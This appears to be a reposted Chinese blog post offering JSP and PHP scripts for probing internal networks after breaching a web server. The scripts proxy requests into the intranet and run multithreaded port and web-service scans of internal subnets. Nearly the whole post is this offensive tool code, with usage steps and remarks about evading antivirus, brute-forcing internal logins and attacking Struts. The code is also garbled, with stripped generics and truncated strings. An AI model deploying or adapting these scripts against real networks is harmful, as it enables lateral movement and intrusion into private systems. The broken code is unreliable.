内网探测脚本(内网代理访问+内网端口扫描) [php+jsp] -------- 屌丝归档笔记
内网探测脚本(内网代理访问+内网端口扫描) [php+jsp]
发布时间:April 2, 2016 // 分类:工作日志,PHP,运维工作,转帖文章,python // No Comments
前言: 某些情况下,内网渗透时,代理出不来,工具传上去被杀,总之就是遇到各种问题。而最过纠结的时,我已经知道内网哪台机器有洞了..(经验多的大神飘过,如果能解决某些内网渗透时遇到的坑的问题,求分享解决方法..)
功能: 代理访问虽然是个简单的功能,但是我觉得够用了。完全可以用来直接扫描内网其他web服务器的目录,尝试内网其其他登陆入口的弱口令,或者直接代理打struts或者其他漏洞。
web扫描: 其实我觉得用web发现更加贴切,其实有了端口扫描为啥还要这个.(因为之前的代码不想动它了。)
端口扫描: 大家都懂。(此功能问题较多,我觉得如果能使用工具或者代理回来就尽量不使用此脚本进行扫描。)
![内网探测脚本(内网代理访问+内网端口扫描) [php+jsp] -------- 屌丝归档笔记_第1张图片](http://img.e-com-net.com/image/info8/4c280040fa7440d482a0865d981627e5.jpg)
<%
@page
import
=
"java.io.File"
%>
<%@ page language=
"java"
import
=
"java.util.*"
pageEncoding=
"UTF-8"
%>
<%@ page isThreadSafe=
"false"
%>
<%
@page
import
=
"java.net.*"
%>
<%
@page
import
=
"java.io.PrintWriter"
%>
<%
@page
import
=
"java.io.BufferedReader"
%>
<%
@page
import
=
"java.io.FileReader"
%>
<%
@page
import
=
"java.io.FileWriter"
%>
<%
@page
import
=
"java.io.OutputStreamWriter"
%>
<%
@page
import
=
"java.util.regex.Matcher"
%>
<%
@page
import
=
"java.io.IOException"
%>
<%
@page
import
=
"java.net.InetAddress"
%>
<%
@page
import
=
"java.util.regex.Pattern"
%>
<%
@page
import
=
"java.net.HttpURLConnection"
%>
<%
@page
import
=
"java.util.concurrent.LinkedBlockingQueue"
%>
<%!
final
static
List
new
ArrayList
String referer =
""
;
String cookie =
""
;
String decode =
"utf-8"
;
int
thread =
100
;
//final static List
String cpath=
""
;
//建立一个HTTP连接
HttpURLConnection getHTTPConn(String urlString) {
try
{
java.net.URL url =
new
java.net.URL(urlString);
java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url
.openConnection();
conn.setRequestMethod(
"GET"
);
conn.addRequestProperty(
"User-Agent"
,
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)"
);
conn.addRequestProperty(
"Accept-Encoding"
,
"gzip"
);
conn.addRequestProperty(
"referer"
, referer);
conn.addRequestProperty(
"cookie"
, cookie);
//conn.setInstanceFollowRedirects(false);
conn.setConnectTimeout(
3000
);
conn.setReadTimeout(
3000
);
return
conn;
}
catch
(Exception e) {
return
null
;
}
}
String PostData(String urlString, String postString) {
HttpURLConnection http =
null
;
String response =
null
;
try
{
java.net.URL url =
new
java.net.URL(urlString);
http = (HttpURLConnection) url.openConnection();
http.setDoInput(
true
);
http.setDoOutput(
true
);
http.setUseCaches(
false
);
http.setConnectTimeout(
50000
);
http.setReadTimeout(
50000
);
http.setRequestMethod(
"POST"
);
http.setRequestProperty(
"Content-Type"
,
"application/x-www-form-urlencoded"
);
http.connect();
OutputStreamWriter osw =
new
OutputStreamWriter(
http.getOutputStream(), decode);
osw.write(postString);
osw.flush();
osw.close();
response = getHtmlByInputStream(http.getInputStream(), decode);
}
catch
(Exception e) {
response = getHtmlByInputStream(http.getErrorStream(), decode);
}
return
response;
}
HttpURLConnection conn;
//从输入流中读取源码
String getHtmlByInputStream(java.io.InputStream is, String code) {
StringBuffer html =
new
StringBuffer();
try
{
java.io.InputStreamReader isr =
new
java.io.InputStreamReader(is,
code);
java.io.BufferedReader br =
new
java.io.BufferedReader(isr);
String temp;
while
((temp = br.readLine()) !=
null
) {
if
(!temp.trim().equals(
""
)) {
html.append(temp).append(
"\n"
);
}
}
br.close();
isr.close();
}
catch
(Exception e) {
System.out.print(e.getMessage());
}
return
html.toString();
}
//获取HTML源码
String getHtmlContext(HttpURLConnection conn, String decode,
boolean
isError) {
Map
new
HashMap
String code =
"utf-8"
;
if
(decode !=
null
) {
code = decode;
}
try
{
return
getHtmlByInputStream(conn.getInputStream(), code);
}
catch
(Exception e) {
try
{
if
(isError){
return
getHtmlByInputStream(conn.getErrorStream(), code);
}
}
catch
(Exception e1) {
System.out.println(
"getHtmlContext2:"
+ e.getMessage());
}
System.out.println(
"getHtmlContext:"
+ e.getMessage());
return
"null"
;
}
}
//获取Server头
String getServerType(HttpURLConnection conn) {
try
{
return
conn.getHeaderField(
"Server"
);
}
catch
(Exception e) {
return
"null"
;
}
}
//匹配标题
String getTitle(String htmlSource) {
try
{
List
new
ArrayList
String title =
""
;
Pattern pa = Pattern.compile(
"
);
Matcher ma = pa.matcher(htmlSource);
while
(ma.find()) {
list.add(ma.group());
}
for
(
int
i =
0
; i < list.size(); i++) {
title = title + list.get(i);
}
return
title.replaceAll(
"<.*?>"
,
""
);
}
catch
(Exception e) {
return
null
;
}
}
//得到css
List
List
new
ArrayList
List
new
ArrayList
try
{
String title =
""
;
Pattern pa = Pattern.compile(
".*href=\"(.*)[.]css"
);
Matcher ma = pa.matcher(html.toLowerCase());
while
(ma.find()) {
cssurl.add(ma.group(
1
) +
".css"
);
}
for
(
int
i =
0
; i < cssurl.size(); i++) {
String cssuuu = url +
"/"
+ cssurl.get(i);
String csshtml =
""
;
csscode.add(csshtml);
}
}
catch
(Exception e) {
System.out.println(
"getCss:"
+ e.getMessage());
}
return
csscode;
}
//域名解析成IP
String getMyIPLocal()
throws
IOException {
InetAddress ia = InetAddress.getLocalHost();
return
ia.getHostAddress();
}
boolean
getHostPort(String task){
Socket client =
null
;
boolean
isOpen=
false
;
try
{
String[] s=task.split(
":"
);
client =
new
Socket(s[
0
], Integer.parseInt(s[
1
]));
isOpen=
true
;
System.out.println(
"getHostPort:"
+task);
//scanportlist.add(task+" >>> Open");
saveScanReslt2(task+
" >>> Open\r\n"
);
}
catch
(Exception e){
isOpen=
false
;
}
return
isOpen;
}
void
getPath(String path){
cpath=path;
}
/* void saveScanReslt(String s){
try{
FileUtils.writeStringToFile(new File(cpath+"/port.txt"), s,"UTF-8",true);
}catch(Exception e){
System.out.print(e.getLocalizedMessage());
}
} */
void
saveScanReslt2(String content) {
FileWriter writer =
null
;
try
{
writer =
new
FileWriter(cpath+
"/port.txt"
,
true
);
writer.write(content);
}
catch
(IOException e) {
System.out.print(e.getLocalizedMessage());
}
finally
{
try
{
if
(writer !=
null
){
writer.close();
}
}
catch
(IOException e) {
System.out.print(e.getLocalizedMessage());
}
}
}
String s=
"Result:
;
String readPortResult(String portfile){
File file =
new
File(portfile);
BufferedReader reader =
null
;
try
{
System.out.println(
""
);
reader =
new
BufferedReader(
new
FileReader(file));
String tempString =
null
;
while
((tempString = reader.readLine()) !=
null
) {
s+=tempString+
"
;
}
reader.close();
}
catch
(IOException e) {
return
null
;
}
finally
{
if
(reader !=
null
) {
try
{
reader.close();
}
catch
(IOException e1) {
return
null
;
}
}
}
return
s;
}
%>
οnclick=
"showDiv('web');"
style=
"margin-left: 32px;"
>Web扫描
href=
"javascript:void(0);"
οnclick=
"showDiv('port');"
style=
"margin-left: 32px;"
>端口扫描
<%
final
JspWriter pwx = out;
String s = application.getRealPath(
"/"
) +
"/port.txt"
;
String result = readPortResult(s);
if
(result !=
null
) {
try
{
pwx.println(result);
}
catch
(Exception e) {
System.out.print(e.getMessage());
}
}
else
{
pwx.println(
"如果你进行了端口扫描操作,那么这里将会显示扫描结果!
);
}
String div1 =
"
;
String u = request.getParameter(
"url"
);
String ip = request.getParameter(
"ip"
);
String scanip = request.getParameter(
"scanip"
);
if
(u !=
null
) {
String post = request.getParameter(
"post"
);
//System.out.print(u);
//System.out.print(post);
decode = request.getParameter(
"decode"
);
String ref = request.getParameter(
"referer"
);
String cook = request.getParameter(
"cookie"
);
if
(ref !=
null
) {
referer = ref;
}
if
(cook !=
null
) {
cookie = cook;
}
String html =
null
;
if
(post !=
null
) {
html = PostData(u, post);
}
else
{
html = getHtmlContext(getHTTPConn(u), decode,
true
);
}
String path = request.getContextPath()+
"/netspy.jsp"
;
System.out.println(
"path:"
+path);
String basePath = request.getScheme()+
"://"
+request.getServerName()+
":"
+request.getServerPort()+path+
"?url="
;
System.out.println(
"base:"
+basePath);
String reaplce =
"href=\""
+basePath;
//html=html.replaceAll("href=['|\"]?http://(.*)['|\"]?", reaplce+"http://$1\"");
html = html.replaceAll(
"href=['|\"]?(?!http)(.*)['|\"]?"
,
reaplce + u +
"$1"
);
List
String csshtml =
""
;
if
(!html.equals(
"null"
)) {
for
(
int
i =
0
; i < css.size(); i++) {
csshtml += css.get(i);
}
out.print(div1 + html + csshtml + div2);
}
else
{
response.setStatus(HttpServletResponse.SC_NOT_FOUND);
out.print(
"请求失败!"
);
}
return
;
}
else
if
(ip !=
null
) {
String threadpp = (request.getParameter(
"thread"
));
String[] port = request.getParameter(
"port"
).split(
","
);
if
(threadpp !=
null
) {
thread = Integer.parseInt(threadpp);
System.out.println(threadpp);
}
try
{
try
{
String http =
"http://"
;
String localIP = getMyIPLocal();
if
(ip !=
null
) {
localIP = ip;
}
String useIP = localIP.substring(
0
,
localIP.lastIndexOf(
"."
) +
1
);
final
Queue
new
LinkedBlockingQueue
for
(
int
i =
1
; i <=
256
; i++) {
for
(
int
j =
0
; j < port.length; j++) {
String url = http + useIP + i +
":"
+ port[j];
queue.offer(url);
System.out.print(url);
}
}
final
JspWriter pw = out;
ThreadGroup tg =
new
ThreadGroup(
"c"
);
for
(
int
i =
0
; i < thread; i++) {
new
Thread(tg,
new
Runnable() {
public
void
run() {
while
(
true
) {
String addr = queue.poll();
if
(addr !=
null
) {
System.out.println(addr);
HttpURLConnection conn = getHTTPConn(addr);
String html = getHtmlContext(conn,
decode,
false
);
String title = getTitle(html);
String serverType = getServerType(conn);
String status = !html
.equals(
"null"
) ?
"Success"
:
"Fail"
;
if
(html !=
null
&& !status.equals(
"Fail"
)) {
try
{
pw.println(addr +
" >> "
+ title +
">>"
+ serverType
+
" >>"
+ status
+
"
);
}
catch
(Exception e) {
e.printStackTrace();
}
}
}
else
{
return
;
}
}
}
}).start();
}
while
(tg.activeCount() !=
0
) {
}
}
catch
(Exception e) {
e.printStackTrace();
}
}
catch
(Exception e) {
out.println(e.toString());
}
}
else
if
(scanip !=
null
) {
getPath(application.getRealPath(
"/"
));
int
thread = Integer.parseInt(request.getParameter(
"thread"
));
String[] port = request.getParameter(
"scanport"
).split(
","
);
String ip1 = scanip;
String ip2 = request.getParameter(
"scanip2"
);
int
start = Integer.parseInt(ip1.substring(
ip1.lastIndexOf(
"."
) +
1
, ip1.length()));
int
end = Integer.parseInt(ip2.substring(
ip2.lastIndexOf(
"."
) +
1
, ip2.length()));
String useIp = scanip.substring(
0
, scanip.lastIndexOf(
"."
) +
1
);
System.out.println(
"start:"
+ start);
System.out.println(
"end:"
+ end);
final
Queue
new
LinkedBlockingQueue
for
(
int
i = start; i <= end; i++) {
for
(
int
j =
0
; j < port.length; j++) {
String scantarget = useIp + i +
":"
+ port[j];
queue.offer(scantarget);
//System.out.println(scantarget);
}
}
System.out.print(
"Count1:"
+ queue.size());
final
JspWriter pw = out;
ThreadGroup tg =
new
ThreadGroup(
"c"
);
for
(
int
i =
0
; i < thread; i++) {
new
Thread(tg,
new
Runnable() {
public
void
run() {
while
(
true
) {
String scantask = queue.poll();
if
(scantask !=
null
) {
getHostPort(scantask);
/* String result = null;
if(isOpen){
result=scantask+ " >>> Open
scanportlist.add(result);
System.out.println(result);
} */
/* try {
pw.println(result);
} catch (Exception e) {
System.out.print(e.getMessage());
} */
}
}
}
}).start();
}
/* while (tg.activeCount() != 0) {
} */
try
{
pw.println(
"扫描线程已经开始,请查看"
+ cpath+
"/port.txt文件或者直接刷新本页面!"
);
}
catch
(Exception e) {
System.out.print(e.getMessage());
}
}
%>
|
前些天看到wooyun社区有人发的jsp内网探测脚本,可以内网代理访问和内网端口扫描。但是却没找到php的既能代理内网,又能扫描内网端口的的脚本。所以我写了这个集合版本的php内网探测脚本。
set_time_limit(0);
//设置程序执行时间
ob_implicit_flush(True);
ob_end_flush();
$url
= isset(
$_REQUEST
[
'url'
])?
$_REQUEST
[
'url'
]:null;
/*端口扫描代码*/
function
check_port(
$ip
,
$port
,
$timeout
=0.1) {
$conn
= @
fsockopen
(
$ip
,
$port
,
$errno
,
$errstr
,
$timeout
);
if
(
$conn
) {
fclose(
$conn
);
return
true;
}
}
function
scanip(
$ip
,
$timeout
,
$portarr
){
foreach
(
$portarr
as
$port
){
if
(check_port(
$ip
,
$port
,
$timeout
=0.1)==True){
echo
'Port: '
.
$port
.
' is open
;
@ob_flush();
@
flush
();
}
}
}
echo
'
Timeout
';
if
(isset(
$_POST
[
'startip'
])&&isset(
$_POST
[
'endip'
])&&isset(
$_POST
[
'port'
])&&isset(
$_POST
[
'timeout'
])){
$startip
=
$_POST
[
'startip'
];
$endip
=
$_POST
[
'endip'
];
$timeout
=
$_POST
[
'timeout'
];
$port
=
$_POST
[
'port'
];
$portarr
=
explode
(
','
,
$port
);
$siparr
=
explode
(
'.'
,
$startip
);
$eiparr
=
explode
(
'.'
,
$endip
);
$ciparr
=
$siparr
;
if
(
count
(
$ciparr
)!=4||
$siparr
[0]!=
$eiparr
[0]||
$siparr
[1]!=
$eiparr
[1]){
exit
(
'IP error: Wrong IP address or Trying to scan class A address'
);
}
if
(
$startip
==
$endip
){
echo
'Scanning IP '
.
$startip
.
'
;
@ob_flush();
@
flush
();
scanip(
$startip
,
$timeout
,
$portarr
);
@ob_flush();
@
flush
();
exit
();
}
if
(
$eiparr
[3]!=255){
$eiparr
[3]+=1;
}
while
(
$ciparr
!=
$eiparr
){
$ip
=
$ciparr
[0].
'.'
.
$ciparr
[1].
'.'
.
$ciparr
[2].
'.'
.
$ciparr
[3];
echo
'
.
$ip
.
'
;
@ob_flush();
@
flush
();
scanip(
$ip
,
$timeout
,
$portarr
);
$ciparr
[3]+=1;
if
(
$ciparr
[3]>255){
$ciparr
[2]+=1;
$ciparr
[3]=0;
}
if
(
$ciparr
[2]>255){
$ciparr
[1]+=1;
$ciparr
[2]=0;
}
}
}
/*内网代理代码*/
function
getHtmlContext(
$url
){
$ch
= curl_init();
curl_setopt(
$ch
, CURLOPT_URL,
$url
);
curl_setopt(
$ch
, CURLOPT_HEADER, TRUE);
//表示需要response header
curl_setopt(
$ch
, CURLOPT_NOBODY, FALSE);
//表示需要response body
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt(
$ch
, CURLOPT_TIMEOUT, 120);
$result
= curl_exec(
$ch
);
global
$header
;
if
(
$result
){
$headerSize
= curl_getinfo(
$ch
, CURLINFO_HEADER_SIZE);
$header
=
explode
(
"\r\n"
,
substr
(
$result
, 0,
$headerSize
));
$body
=
substr
(
$result
,
$headerSize
);
}
if
(curl_getinfo(
$ch
, CURLINFO_HTTP_CODE) ==
'200'
) {
return
$body
;
}
if
(curl_getinfo(
$ch
, CURLINFO_HTTP_CODE) ==
'302'
) {
$location
= getHeader(
"Location"
);
if
(
strpos
(getHeader(
"Location"
),
'http://'
) == false){
$location
= getHost(
$url
).
$location
;
}
return
getHtmlContext(
$location
);
}
return
NULL;
}
function
getHost(
$url
){
preg_match(
"/^(http:\/\/)?([^\/]+)/i"
,
$url
,
$matches
);
return
$matches
[0];
}
function
getCss(
$host
,
$html
){
preg_match_all(
"/
,
$html
,
$matches
);
foreach
(
$matches
[1]
as
$v
){
$cssurl
=
$v
;
if
(
strpos
(
$v
,
'http://'
) == false){
$cssurl
=
$host
.
"/"
.
$v
;
}
$csshtml
=
""
;
$html
.=
$csshtml
;
}
return
$html
;
}
if
(
$url
!= null){
$host
= getHost(
$url
);
echo
getCss(
$host
,getHtmlContext(
$url
));
}
?>
|
用法:
1、端口扫描部分:
填好起始ip、结束ip、自定义端口、超时等,点击扫描即可,十分方便
2、内网代理部分:
直接在文件后面加url参数,注意这里要带着http协议,不然可能css加载不完
from
http://jeary.org/post-69.html
http://www.answ.cc/?post=18